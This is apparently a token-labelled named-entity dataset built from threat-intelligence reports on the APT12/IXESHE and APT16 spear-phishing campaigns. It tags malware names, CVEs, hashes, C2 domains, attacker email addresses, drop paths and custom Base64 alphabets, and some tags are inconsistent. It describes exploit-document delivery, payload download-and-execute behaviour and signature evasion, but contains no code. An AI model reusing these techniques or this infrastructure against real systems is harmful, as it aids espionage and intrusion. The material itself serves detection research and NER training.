O + +To O +date O +, O +we O +have O +seen O +several O +custom O +Base64 S-ENCR +alphabets O +, O +including O +: O ++NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA O +, O +HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O +, O +j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we O +mKckJLBofCDrs9VtWXlEu O +, O +p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ O +zPgUx67FMhYb8q3wemKc O +, O +aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O +, O +ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu O +. O + +Some O +similarities O +exist O +across O +different O +versions O +of O +the O +Base64 S-ENCR +alphabet O +, O +which O +indicates O +that O +these O +are O +most O +likely O +not O +completely O +randomly O +generated O +. O + +Instead O +, O +the O +attackers O +manually O +cut O +and O +pasted O +older O +versions O +after O +altering O +some O +parts O +. O + +The O +malware O +ID O +seems O +to O +be O +a O +campaign O +code O +with O +a O +different O +IP O +address O +for O +each O +attack O +. O + +Some O +of O +the O +campaign O +codes O +we O +have O +seen O +include O +: O +CRML_0505 S-MAL +, O +CRML_MIL S-MAL +, O +Firebox4 S-MAL +, O +JUST_0525 S-MAL +, O +ML0628 S-MAL +, O +MW0629 S-MAL +, O +OM222 S-MAL +. O + +The O +IXESHE S-APT +campaign O +has O +been O +successfully O +executing O +targeted O +attacks O +since O +2009 O +. O + +The O +attackers O +primarily O +use O +malicious O +.PDF S-FILE +files O +that O +exploit O +vulnerabilities O +in O +Adobe B-TOOL +Reader E-TOOL +, O +Acrobat S-TOOL +, O +and O +Flash B-TOOL +Player E-TOOL +, O +including O +the O +use O +of O +two O +zero-day S-VULNAME +exploits—one O +in O +2009 O +and O +another O +in O +2011 O +. 
O + +While O +the O +attackers O +primarily O +targeted O +East O +Asian O +governments O +in O +the O +past O +, O +they O +have O +also O +started O +targeting O +a O +telecommunications O +company O +and O +electronics O +manufacturers O +. O + +They O +kept O +track O +of O +their O +targeted O +attacks O +by O +embedding O +a O +“ O +campaign O +tag O +” O +in O +the O +malware O +that O +appears O +to O +describe O +when O +each O +attack O +was O +launched O +and O +, O +in O +some O +cases O +, O +the O +nature O +of O +its O +target O +. O + +We O +found O +more O +than O +40 O +of O +these O +campaign O +tags O +. O + +The O +IXESHE S-APT +attackers O +are O +notable O +for O +their O +use O +of O +compromised O +machines O +within O +a O +target O +’s O +internal O +network O +as O +C&C S-TOOL +servers O +. O + +This O +helped O +disguise O +their O +activities O +. O + +In O +addition O +, O +the O +attackers O +’ O +use O +of O +the O +proxy O +tool O +, O +HTran S-TOOL +, O +also O +helped O +mask O +their O +true O +location O +. O + +While O +their O +identities O +remain O +unknown O +, O +the O +attackers O +behind O +the O +IXESHE S-APT +campaign O +demonstrated O +that O +they O +were O +both O +determined O +and O +capable O +. O + +While O +the O +malware O +used O +in O +the O +attacks O +were O +not O +very O +complicated O +by O +nature O +, O +these O +proved O +very O +effective O +. O + + +APT12 S-APT +. O + +The O +attackers O +referred O +to O +as O +APT12 S-APT +( O +also O +known O +as O +IXESHE S-APT +, O +DynCalc S-APT +, O +and O +DNSCALC S-APT +) O +recently O +started O +a O +new O +campaign O +targeting O +organizations O +in O +Japan S-LOC +and O +Taiwan S-LOC +. O + +APT12 S-APT +is O +believed O +to O +be O +a O +cyber O +espionage O +group O +thought O +to O +have O +links O +to O +the O +Chinese B-IDTY +People's I-IDTY +Liberation I-IDTY +Army E-IDTY +. 
O + +APT12 S-APT +'s O +targets O +are O +consistent O +with O +larger O +People's B-IDTY +Republic I-IDTY +of I-IDTY +China E-IDTY +( O +PRC S-IDTY +) O +goals O +. O + +Intrusions O +and O +campaigns O +conducted O +by O +this O +group O +are O +in-line O +with O +PRC S-IDTY +goals O +and O +self-interest O +in O +Taiwan S-LOC +. O + +Additionally O +, O +the O +new O +campaigns O +we O +uncovered O +further O +highlight O +the O +correlation O +between O +APT O +groups O +ceasing O +and O +retooling O +operations O +after O +media O +exposure O +, O +as O +APT12 S-APT +used O +the O +same O +strategy O +after O +compromising O +the O +New B-IDTY +York I-IDTY +Times E-IDTY +in O +Oct O +2012 O +. O + +Much O +like O +Darwin O +’s O +theory O +of O +biological O +evolution O +, O +APT12 S-APT +been O +forced O +to O +evolve O +and O +adapt O +in O +order O +to O +maintain O +its O +mission O +. O + +FireEye S-SECTEAM +researchers O +discovered O +two O +possibly O +related O +campaigns O +utilizing O +two O +other O +backdoors O +known O +as O +THREEBYTE S-MAL +and O +WATERSPOUT S-MAL +. O + +Both O +backdoors O +were O +dropped O +from O +malicious O +documents O +built O +utilizing O +the O +“ O +Tran B-TOOL +Duy I-TOOL +Linh E-TOOL +” O +exploit O +kit O +, O +which O +exploited O +CVE-2012-0158 S-VULID +. O + +These O +documents O +were O +also O +emailed O +to O +organizations O +in O +Japan S-LOC +and O +Taiwan S-LOC +. O + +While O +APT12 S-APT +has O +previously O +used O +THREEBYTE S-MAL +, O +it O +is O +unclear O +if O +APT12 S-APT +was O +responsible O +for O +the O +recently O +discovered O +campaign O +utilizing O +THREEBYTE S-MAL +. O + +Similarly O +, O +WATERSPOUT S-MAL +is O +a O +newly O +discovered O +backdoor O +and O +the O +threat O +actors O +behind O +the O +campaign O +have O +not O +been O +positively O +identified O +. 
O + +However O +, O +the O +WATERSPOUT S-MAL +campaign O +shared O +several O +traits O +with O +the O +RIPTIDE S-MAL +and O +HIGHTIDE S-MAL +campaign O +that O +we O +have O +attributed O +to O +APT12 S-APT +. O + +From O +October O +2012 O +to O +May O +2014, O +FireEye S-SECTEAM +observed O +APT12 S-APT +utilizing O +RIPTIDE S-MAL +, O +a O +proxy-aware O +backdoor O +that O +communicates O +via O +HTTP S-PROT +to O +a O +hard-coded O +command B-TOOL +and I-TOOL +control E-TOOL +( O +C2 S-TOOL +) O +server O +. O + +RIPTIDE S-MAL +’s O +first O +communication O +with O +its O +C2 S-TOOL +server O +fetches O +an O +encryption O +key O +, O +and O +the O +RC4 S-ENCR +encryption O +key O +is O +used O +to O +encrypt O +all O +further O +communication O +. O + +In O +June O +2014, O +Arbor S-IDTY +Networks O +published O +an O +article O +describing O +the O +RIPTIDE B-MAL +backdoor E-MAL +and O +its O +C2 S-TOOL +infrastructure O +in O +great O +depth O +. O + +The O +blog O +highlighted O +that O +the O +backdoor O +was O +utilized O +in O +campaigns O +from O +March O +2011 O +till O +May O +2014 O +. O + +Following O +the O +release O +of O +the O +article O +, O +FireEye S-SECTEAM +observed O +a O +distinct O +change O +in O +RIPTIDE S-MAL +’s O +protocols O +and O +strings O +. O + +We O +suspect O +this O +change O +was O +a O +direct O +result O +of O +the O +Arbor S-IDTY +blog O +post O +in O +order O +to O +decrease O +detection O +of O +RIPTIDE S-MAL +by O +security O +vendors O +. O + +The O +changes O +to O +RIPTIDE S-MAL +were O +significant O +enough O +to O +circumvent O +existing O +RIPTIDE S-MAL +detection O +rules O +. O + +FireEye S-SECTEAM +dubbed O +this O +new O +malware O +family O +HIGHTIDE S-MAL +. O + +On O +Sunday O +August O +24, O +2014 O +we O +observed O +a O +spear B-ACT +phish E-ACT +email S-TOOL +sent O +to O +a O +Taiwanese B-IDTY +government E-IDTY +ministry O +. 
O + +Attached O +to O +this O +email S-TOOL +was O +a O +malicious O +Microsoft S-IDTY +Word S-TOOL +document O +( O +MD5: O +f6fafb7c30b1114befc93f39d0698560 S-MD5 +) O +that O +exploited O +CVE-2012-0158 S-VULID +. O + +It O +is O +worth O +noting O +that O +this O +email S-TOOL +appeared O +to O +have O +been O +sent O +from O +another O +Taiwanese B-IDTY +Government E-IDTY +employee O +, O +implying O +that O +the O +email S-TOOL +was O +sent O +from O +a O +valid O +but O +compromised O +account O +. O + +HIGHTIDE S-MAL +: O +6e59861931fa2796ee107dc27bfdd480 S-MD5 +. O + +The O +HIGHTIDE B-MAL +backdoor E-MAL +connected O +directly O +to O +141.108.2.157 S-IP +. O + +If O +you O +compare O +the O +HTTP S-PROT +GET O +request O +from O +the O +RIPTIDE S-MAL +samples O +to O +the O +HTTP S-PROT +GET O +request O +from O +the O +HIGHTIDE S-MAL +samples O +you O +can O +see O +the O +malware O +author O +changed O +the O +following O +items O +: O +User O +Agent O +, O +Format O +and O +structure O +of O +the O +HTTP S-PROT +Uniform B-TOOL +Resource I-TOOL +Identifier E-TOOL +( O +URI S-TOOL +) O +. O + +Similar O +to O +RIPTIDE S-MAL +campaigns O +, O +APT12 S-APT +infects O +target O +systems O +with O +HIGHTIDE S-MAL +using O +a O +Microsoft S-IDTY +Word S-TOOL +( O +.doc S-FILE +) O +document O +that O +exploits O +CVE-2012-0158 S-VULID +. O + +FireEye S-SECTEAM +observed O +APT12 S-APT +deliver O +these O +exploit O +documents O +via O +phishing E-ACT +emails S-TOOL +in O +multiple O +cases O +. O + +Based O +on O +past O +APT12 S-APT +activity O +, O +we O +expect O +the O +threat O +group O +to O +continue O +to O +utilize O +phishing E-ACT +as O +a O +malware O +delivery O +method O +. O +0824.1.doc S-FILE +: O +f6fafb7c30b1114befc93f39d0698560 S-MD5 +, O +CVE-2012-0158 S-VULID +. O + +Jason_invitation.doc S-FILE +: O +00a95fb30be2d6271c491545f6c6a707 S-MD5 +, O +CVE-2012-0158 S-VULID +. 
O + +When O +the O +file O +is O +opened O +, O +it O +drops O +HIGHTIDE S-MAL +in O +the O +form O +of O +an O +executable O +file O +onto O +the O +infected O +system O +. O + +RIPTIDE S-MAL +and O +HIGHTIDE S-MAL +differ O +on O +several O +points O +: O +executable O +file O +location O +, O +image O +base O +address O +, O +the O +User-Agent O +within O +the O +GET O +requests O +, O +and O +the O +format O +of O +the O +URI S-TOOL +. O + +The O +RIPTIDE S-MAL +exploit O +document O +drops O +its O +executable O +file O +into O +the O +C:\Documents O +and O +Settings\{user}\Application O +Data\Location O +folder O +while O +the O +HIGHTIDE S-MAL +exploit O +document O +drops O +its O +executable O +file O +into O +the O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\ O +folder O +. O + +All O +but O +one O +sample O +that O +we O +identified O +were O +written O +to O +this O +folder O +as O +word.exe S-FILE +. O + +The O +one O +outlier O +was O +written O +as O +winword.exe S-FILE +. O + +Research O +into O +this O +HIGHTIDE S-MAL +campaign O +revealed O +APT12 S-APT +targeted O +multiple O +Taiwanese B-IDTY +Government E-IDTY +organizations O +between O +August O +22 O +and O +28 O +. O + +On O +Monday O +August O +25, O +2014 O +we O +observed O +a O +different O +spear B-ACT +phish E-ACT +email S-TOOL +sent O +from O +lilywang823@gmail.com S-EMAIL +to O +a O +technology O +company O +located O +in O +Taiwan S-LOC +. O + +This O +spear B-ACT +phish E-ACT +contained O +a O +malicious O +Word S-TOOL +document O +that O +exploited O +CVE-2012-0158 S-VULID +. O + +The O +MD5 S-ENCR +of O +the O +exploit O +document O +was O +e009b95ff7b69cbbebc538b2c5728b11 S-MD5 +. O + +Similar O +to O +the O +newly O +discovered O +HIGHTIDE S-MAL +samples O +documented O +above O +, O +this O +malicious O +document O +dropped O +a O +backdoor O +to O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\word.exe S-FILE +. 
O + +THREEBYTE S-MAL +: O +16e627dbe730488b1c3d448bfc9096e2 S-MD5 +. O + +This O +backdoor O +sent O +the O +following O +callback O +traffic O +to O +video.csmcpr.com S-DOM +. O + +The O +THREEBYTE S-MAL +spear B-ACT +phishing E-ACT +incident O +( O +while O +not O +yet O +attributed O +) O +shared O +the O +following O +characteristics O +with O +the O +above O +HIGHTIDE S-MAL +campaign O +attributed O +to O +APT12 S-APT +: O +The O +THREEBYTE B-MAL +backdoor E-MAL +was O +compiled O +two O +days O +after O +the O +HIGHTIDE B-MAL +backdoors E-MAL +; O + +Both O +the O +THREEBYTE S-MAL +and O +HIGHTIDE B-MAL +backdoors E-MAL +were O +used O +in O +attacks O +targeting O +organizations O +in O +Taiwan S-LOC +; O + +Both O +the O +THREEBYTE S-MAL +and O +HIGHTIDE B-MAL +backdoors E-MAL +were O +written O +to O +the O +same O +filepath O +of O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\word.exe S-FILE +; O + +APT12 S-APT +has O +previously O +used O +the O +THREEBYTE B-MAL +backdoor E-MAL +. O + +On O +August O +25, O +2014, O +we O +observed O +another O +round O +of O +spear B-ACT +phishing E-ACT +emails S-TOOL +targeting O +a O +high-technology O +company O +in O +Japan S-LOC +. O + +Attached O +to O +this O +email S-TOOL +was O +another O +malicious O +document O +that O +was O +designed O +to O +exploit O +CVE-2012-0158 S-VULID +. O + +This O +malicious O +Word O +document O +had O +an O +MD5 S-ENCR +of O +499bec15ac83f2c8998f03917b63652e S-MD5 +and O +dropped O +a O +backdoor O +to O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\word.exe S-FILE +. O + +The O +backdoor O +had O +the O +following O +properties O +: O + +WATERSPOUT S-MAL +: O + +f9cfda6062a8ac9e332186a7ec0e706a S-MD5 +. O + +The O +backdoor O +connects O +to O +a O +command O +and O +control O +server O +at O +icc.ignorelist.com S-DOM +. 
O + +Similar O +to O +RIPTIDE S-MAL +and O +HIGHTIDE S-MAL +, O +the O +WATERSPOUT B-MAL +backdoor E-MAL +is O +an O +HTTP S-PROT +based O +backdoor O +that O +communicates O +with O +its O +C2 S-TOOL +server O +. O + +Although O +there O +are O +no O +current O +infrastructure O +ties O +to O +link O +this O +backdoor O +to O +APT12 S-APT +, O +there O +are O +several O +data O +points O +that O +show O +a O +possible O +tie O +to O +the O +same O +actors O +: O + +Same O +initial O +delivery O +method O +( O +spear B-ACT +phishing E-ACT +email S-TOOL +) O +with O +a O +Microsoft S-IDTY +Word S-TOOL +Document O +exploiting O +CVE-2012-0158 S-VULID +. O + +The O +same O +“ O +Tran B-TOOL +Duy I-TOOL +Linh E-TOOL +” O +Microsoft S-IDTY +Word S-TOOL +Exploit O +Kit O +was O +used O +in O +delivery O +of O +this O +backdoor O +. O + +Similar O +Targets O +were O +observed O +where O +the O +threat O +actors O +utilized O +this O +backdoor O +: O +Japanese B-IDTY +Tech I-IDTY +Company E-IDTY +, O +Taiwanese B-IDTY +Government E-IDTY +Organizations O +, O +Organizations O +in O +the O +Asia-Pacific B-LOC +Region E-LOC +that O +are O +of O +Interest O +to O +China S-LOC +. O + +The O +WATERSPOUT B-MAL +backdoor E-MAL +was O +written O +to O +the O +same O +file O +path O +as O +the O +HIGHTIDE B-MAL +backdoors E-MAL +: O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\word.exe S-FILE +, O +C:\DOCUMENTS O +and O +SETTINGS\{user}\LOCAL O +SETTINGS\Temp\winword.exe S-FILE +. O + +WATERSPOUT S-MAL +was O +compiled O +within O +two O +days O +of O +the O +last O +HIGHTIDE B-MAL +backdoor E-MAL +and O +on O +the O +same O +day O +as O +the O +THREEBYTE B-MAL +backdoor E-MAL +. O + +APT12 S-APT +closely O +monitors O +online O +media O +related O +to O +its O +tools O +and O +operations O +and O +reacts O +when O +its O +tools O +are O +publicly O +disclosed O +. 
O + +APT12 S-APT +has O +the O +ability O +to O +adapt O +quickly O +to O +public O +exposures O +with O +new O +tools O +, O +tactics O +, O +and O +procedures O +( O +TTPs O +) O +. O + +Public O +disclosures O +may O +result O +in O +an O +immediate O +change O +in O +APT12 S-APT +’s O +tools O +. O + +These O +changes O +may O +be O +temporary O +and O +FireEye S-SECTEAM +believes O +they O +are O +aimed O +at O +decreasing O +detection O +of O +their O +tools O +until O +a O +more O +permanent O +and O +effective O +TTP O +change O +can O +be O +implemented O +( O +e.g. O +, O +WATERSPOUT S-MAL +) O +. O + +Although O +these O +points O +do O +not O +definitively O +tie O +WATERSPOUT S-MAL +to O +APT12 S-APT +, O +they O +do O +indicate O +a O +possible O +connection O +between O +the O +WATERSPOUT S-MAL +campaign O +, O +the O +THREEBYTE S-MAL +campaign O +, O +and O +the O +HIGHTIDE S-MAL +campaign O +attributed O +to O +APT12 S-APT +. O + +FireEye S-SECTEAM +believes O +the O +change O +from O +RIPTIDE S-MAL +to O +HIGHTIDE S-MAL +represents O +a O +temporary O +tool O +shift O +to O +decrease O +malware O +detection O +while O +APT12 S-APT +developed O +a O +completely O +new O +malware O +toolset O +. O + +These O +development O +efforts O +may O +have O +resulted O +in O +the O +emergence O +of O +the O +WATERSPOUT B-MAL +backdoor E-MAL +. O + +Though O +public O +disclosures O +resulted O +in O +APT12 S-APT +adaptations O +, O +FireEye S-SECTEAM +observed O +only O +a O +brief O +pause O +in O +APT12 S-APT +activity O +before O +the O +threat O +actors O +returned O +to O +normal O +activity O +levels O +. O + +Similarly O +, O +the O +public O +disclosure O +of O +APT12 S-APT +’s O +intrusion O +at O +the O +New B-IDTY +York I-IDTY +Times E-IDTY +also O +led O +to O +only O +a O +brief O +pause O +in O +the O +threat O +group O +’s O +activity O +and O +immediate O +changes O +in O +TTPs O +. 
O + +The O +pause O +and O +retooling O +by O +APT12 S-APT +was O +covered O +in O +the O +Mandiant S-SECTEAM +2014 O +M-Trends S-SECTEAM +report O +. O + +Currently O +, O +APT12 S-APT +continues O +to O +target O +organizations O +and O +conduct O +cyber O +operations O +using O +its O +new O +tools O +. O + +Most O +recently O +, O +FireEye S-SECTEAM +observed O +HIGHTIDE S-MAL +at O +multiple O +Taiwan-based O +organizations O +and O +the O +suspected O +APT12 S-APT +WATERSPOUT B-MAL +backdoor E-MAL +at O +a O +Japan-based O +electronics O +company O +. O + + +APT12 S-APT +. O + +The O +attackers O +behind O +the O +breach O +of O +the O +New B-IDTY +York I-IDTY +Times E-IDTY +’ O +computer O +network O +late O +last O +year O +appear O +to O +be O +mounting O +fresh O +assaults O +that O +leverage O +new O +and O +improved O +versions O +of O +malware O +. O + +The O +new O +campaigns O +mark O +the O +first O +significant O +stirrings O +from O +the O +group O +since O +it O +went O +silent O +in O +January O +in O +the O +wake O +of O +a O +detailed O +expose O +of O +the O +group O +and O +its O +exploits O +— O +and O +a O +retooling O +of O +what O +security O +researchers O +believe O +is O +a O +massive O +spying O +operation O +based O +in O +China S-LOC +. O + +The O +newest O +campaign O +uses O +updated O +versions O +of O +Aumlib S-MAL +and O +Ixeshe S-MAL +. O + +Aumlib S-MAL +, O +which O +for O +years O +has O +been O +used O +in O +targeted O +attacks O +, O +now O +encodes O +certain O +HTTP S-PROT +communications O +. O + +FireEye S-SECTEAM +researchers O +spotted O +the O +malware O +when O +analyzing O +a O +recent O +attempted O +attack O +on O +an O +organization O +involved O +in O +shaping O +economic O +policy O +. 
O + +And O +a O +new O +version O +of O +Ixeshe S-MAL +, O +which O +has O +been O +in O +service O +since O +2009 O +to O +attack O +targets O +in O +East B-LOC +Asia E-LOC +, O +uses O +new O +network O +traffic O +patterns O +, O +possibly O +to O +evade O +traditional O +network O +security O +systems O +. O + +The O +updates O +are O +significant O +for O +both O +of O +the O +longstanding O +malware O +families O +; O +before O +this O +year O +, O +Aumlib S-MAL +had O +not O +changed O +since O +at O +least O +May O +2011, O +and O +Ixeshe O +had O +not O +evolved O +since O +at O +least O +December O +2011 O +. O + +Cybercriminals O +are O +constantly O +evolving O +and O +adapting O +in O +their O +attempts O +to O +bypass O +computer O +network O +defenses O +. O + +But O +, O +larger O +, O +more O +successful O +threat O +actors O +tend O +to O +evolve O +at O +a O +slower O +rate O +. O + +As O +long O +as O +these O +actors O +regularly O +achieve O +their O +objective O +( O +stealing O +sensitive O +data O +) O +, O +they O +are O +not O +motivated O +to O +update O +or O +rethink O +their O +techniques O +, O +tactics O +, O +or O +procedures O +( O +TTPs O +) O +. O + +These O +threat O +actors O +’ O +tactics O +follow O +the O +same O +principles O +of O +evolution O +– O +successful O +techniques O +propagate O +, O +and O +unsuccessful O +ones O +are O +abandoned O +. O + +Attackers O +do O +not O +change O +their O +approach O +unless O +an O +external O +force O +or O +environmental O +shift O +compels O +them O +to O +. O + +As O +the O +old O +saying O +goes O +: O +If O +it O +ain’t O +broke O +, O +don’t O +fix O +it O +. O + +So O +when O +a O +larger O +, O +successful O +threat O +actor O +changes O +up O +tactics O +, O +the O +move O +always O +piques O +our O +attention O +. O + +Naturally O +, O +our O +first O +priority O +is O +ensuring O +that O +we O +detect O +the O +new O +or O +altered O +TTPs O +. 
O + +But O +we O +also O +attempt O +to O +figure O +out O +why O +the O +adversary O +changed O +— O +what O +broke? O +— O +so O +that O +we O +can O +predict O +if O +and O +when O +they O +will O +change O +again O +in O +the O +future O +. O + +We O +observed O +an O +example O +of O +this O +phenomenon O +around O +May O +. O + +About O +four O +months O +after O +The O +New B-IDTY +York I-IDTY +Times E-IDTY +publicized O +an O +attack O +on O +its O +network O +, O +the O +attackers O +behind O +the O +intrusion O +deployed O +updated O +versions O +of O +their O +Backdoor.APT.Aumlib S-FILE +and O +Backdoor.APT.Ixeshe S-FILE +malware O +families O +. O + +The O +previous O +versions O +of O +Aumlib S-MAL +had O +not O +changed O +since O +at O +least O +May O +2011, O +and O +Ixeshe O +had O +not O +evolved O +since O +at O +least O +December O +2011 O +. O + +We O +cannot O +say O +for O +sure O +whether O +the O +attackers O +were O +responding O +to O +the O +scrutiny O +they O +received O +in O +the O +wake O +of O +the O +episode O +. O + +But O +we O +do O +know O +the O +change O +was O +sudden O +. O + +Akin O +to O +turning O +a O +battleship O +, O +retooling O +TTPs O +of O +large O +threat O +actors O +is O +formidable O +. O + +Such O +a O +move O +requires O +recoding O +malware O +, O +updating O +infrastructure O +, O +and O +possibly O +retraining O +workers O +on O +new O +processes O +. O + +The O +following O +sections O +detail O +the O +changes O +to O +Backdoor.APT.Aumlib S-FILE +and O +Backdoor.APT.Ixeshe S-FILE +. O + +Backdoor.APT.Aumlib S-FILE +: O + +A O +recently O +observed O +malware O +sample O +( O +hash O +value O +832f5e01be536da71d5b3f7e41938cfb S-MD5 +) O +appears O +to O +be O +a O +modified O +variant O +of O +Aumlib S-MAL +. 
O + +The O +sample O +, O +which O +was O +deployed O +against O +an O +organization O +involved O +in O +shaping O +economic O +policy O +, O +was O +downloaded O +from O +the O +following O +URL O +: O + +status.acmetoy.com S-URL +/DD/ O +myScript.js S-FILE +or O +status.acmetoy.com S-URL +/DD/ O +css.css S-FILE +. O + +This O +output O +reveals O +the O +following O +changes O +when O +compared O +with O +earlier O +variants O +: O + +The O +POST O +URI O +is O +changed O +to O +/bbs/ O +search.asp S-FILE +( O +as O +mentioned O +, O +earlier O +Aumlib S-MAL +variants O +used O +a O +POST O +URI O +of O +/bbs/ O +info.asp S-FILE +. O +) O +The O +POST O +body O +is O +now O +encoded O +. O + +These O +subtle O +changes O +may O +be O +enough O +to O +circumvent O +existing O +IDS O +signatures O +designed O +to O +detect O +older O +variants O +of O +the O +Aumlib S-MAL +family O +. O + +The O +sample O +832f5e01be536da71d5b3f7e41938cfb S-MD5 +shares O +code O +with O +an O +older O +Aumlib S-MAL +variant O +with O +the O +hash O +cb3dcde34fd9ff0e19381d99b02f9692 S-MD5 +. O + +The O +sample O +cb3dcde34fd9ff0e19381d99b02f9692 S-MD5 +connected O +to O +documents.myPicture.info S-URL +and O +www.documents.myPicture.info S-URL +and O +as O +expected O +generated O +the O +a O +POST O +request O +to O +/bbs/ O +info.asp S-FILE +. O + +Backdoor.APT.Ixeshe S-FILE +: O + +Ixeshe S-MAL +has O +been O +used O +in O +targeted O +attacks O +since O +2009, O +often O +against O +entities O +in O +East B-LOC +Asia E-LOC +. O + +The O +network O +traffic O +is O +encoded O +with O +a O +custom O +Base64 S-ENCR +alphabet O +. O + +We O +analyzed O +a O +recent O +sample O +that O +appears O +to O +have O +targeted O +entities O +in O +Taiwan S-LOC +, O +a O +target O +consistent O +with O +previous O +Ixeshe S-MAL +activity O +. 
O + +This O +sample O +( O +aa873ed803ca800ce92a39d9a683c644 S-MD5 +) O +exhibited O +network O +traffic O +that O +does O +not O +match O +the O +earlier O +pattern O +and O +therefore O +may O +evade O +existing O +network O +traffic O +signatures O +designed O +to O +detect O +Ixeshe S-MAL +related O +infections O +. O + + +APT16 S-APT +. O + +Between O +November O +26, O +2015, O +and O +December O +1, O +2015, O +known O +and O +suspected O +China S-LOC +based O +APT O +groups O +launched O +several O +spear B-ACT +phishing E-ACT +attacks O +targeting O +Japanese O +and O +Taiwanese O +organizations O +in O +the O +high-tech O +, O +government O +services O +, O +media O +and O +financial O +services O +industries O +. O + +Each O +campaign O +delivered O +a O +malicious O +Microsoft S-IDTY +Word S-TOOL +document O +exploiting O +the O +aforementioned O +EPS S-TOOL +dict O +copy O +use-after-free O +vulnerability O +, O +and O +the O +local O +Windows S-OS +privilege O +escalation O +vulnerability O +CVE-2015-1701 S-VULID +. O + +The O +successful O +exploitation O +of O +both O +vulnerabilities O +led O +to O +the O +delivery O +of O +either O +a O +downloader O +that O +we O +refer O +to O +as O +IRONHALO S-MAL +, O +or O +a O +backdoor O +that O +we O +refer O +to O +as O +ELMER S-MAL +. O + +On O +November O +26, O +2015, O +a O +suspected O +China S-LOC +based O +APT O +group O +sent O +Japanese O +defense O +policy-themed O +spear B-ACT +phishing E-ACT +emails S-TOOL +to O +multiple O +Japanese O +financial O +and O +high-tech O +companies O +. O + +As O +shown O +in O +Figure O +1, O +the O +emails S-TOOL +originated O +from O +the O +Yahoo S-IDTY +! O +email S-TOOL +address O +mts03282000@yahoo.co.jp S-EMAIL +, O +and O +contained O +the O +subject O +“ O +Sending O +of O +New O +Year O +No +. O + +Foreword O +” O +. O + +Each O +phishing E-ACT +message O +contained O +the O +same O +malicious O +Microsoft S-IDTY +Word S-TOOL +attachment O +. 
O + +The O +malicious O +attachment O +resembled O +an O +article O +hosted O +on O +a O +legitimate O +Japanese O +defense-related O +website O +, O +as O +both O +discussed O +national O +defense O +topics O +and O +carried O +the O +same O +byline O +. O + +The O +lure O +documents O +also O +used O +the O +Japanese O +calendar O +, O +as O +indicated O +by O +the O +27th O +year O +in O +the O +Heisei O +period O +. O + +This O +demonstrates O +that O +the O +threat O +actors O +understand O +conventional O +Japanese O +date O +notation O +. O + +Following O +the O +exploitation O +of O +the O +EPS S-TOOL +and O +CVE-2015-1701 S-VULID +vulnerabilities O +, O +the O +exploit O +payload O +drops O +either O +a O +32-bit O +or O +64-bit O +binary O +containing O +an O +embedded O +IRONHALO S-MAL +malware O +sample O +. O + +IRONHALO S-MAL +is O +a O +downloader O +that O +uses O +the O +HTTP S-PROT +protocol O +to O +retrieve O +a O +Base64 S-ENCR +encoded O +payload O +from O +a O +hard-coded O +command-and-control S-TOOL +( O +C2 S-TOOL +) O +server O +and O +uniform O +resource O +locator O +( O +URL O +) O +path O +. O + +The O +encoded O +payload O +is O +written O +to O +a O +temporary O +file O +, O +decoded O +and O +executed O +in O +a O +hidden O +window O +. O + +The O +encoded O +and O +decoded O +payloads O +are O +written O +to O +files O +named O +igfxHK[%rand%].dat S-FILE +and O +igfxHK[%rand%].exe S-FILE +respectively O +, O +where O +[%rand%] O +is O +a O +4-byte O +hexadecimal O +number O +based O +on O +the O +current O +timestamp O +. O + +IRONHALO S-MAL +: O +AcroRd32Info.exe.exe S-FILE +a8ccb2fc5fec1b89f778d93096f8dd65 S-MD5 +. O + +IRONHALO S-MAL +persists O +by O +copying O +itself O +to O +the O +current O +user O +’s O +Startup S-TOOL +folder O +. 
O + +This O +variant O +sends O +an O +HTTP S-PROT +request O +to O +a O +legitimate O +Japanese O +website O +using O +a O +malformed O +User-Agent S-TOOL +string O +, O +as O +shown O +in O +Figure O +2 O +. O + +The O +threat O +actors O +likely O +compromised O +the O +legitimate O +site O +and O +attempted O +to O +use O +it O +as O +a O +staging O +server O +for O +second-stage O +payloads O +. O + +On O +December O +1, O +2015, O +threat O +actors O +launched O +two O +additional O +spear B-ACT +phishing E-ACT +attacks O +exploiting O +the O +undisclosed O +EPS S-TOOL +vulnerability O +and O +CVE-2015-1701 S-VULID +. O + +Unlike O +the O +Nov. O +26 O +campaign O +, O +these O +attacks O +targeted O +Taiwanese O +governmental O +and O +media O +and O +entertainment O +organizations O +. O + +Moreover O +, O +the O +exploit O +dropped O +a O +different O +malware O +payload O +, O +a O +backdoor O +we O +refer O +to O +as O +ELMER S-MAL +. O + +The O +first O +spear B-ACT +phishing E-ACT +message O +was O +sent O +to O +a O +Taiwanese O +governmental O +employee O +on O +Dec. O +1 O +. O + +The O +attachment O +was O +created O +using O +the O +traditional O +Chinese O +character O +set O +, O +and O +contained O +a O +flowchart O +that O +appeared O +to O +be O +taken O +from O +the O +legitimate O +Taiwanese B-IDTY +government E-IDTY +auction O +website O +http://shwoo.gov.taipei/buyer_flowchart.asp S-URL +. O + +The O +second O +December O +spear B-ACT +phishing E-ACT +attack O +targeted O +Taiwan S-LOC +based O +news O +media O +organizations O +. O + +The O +emails S-TOOL +originated O +from O +the O +address O +dpptccb.dpp@msa.hinet.net S-EMAIL +, O +and O +contained O +the O +subject O +DPP's O +Contact O +Information O +Update O +. 
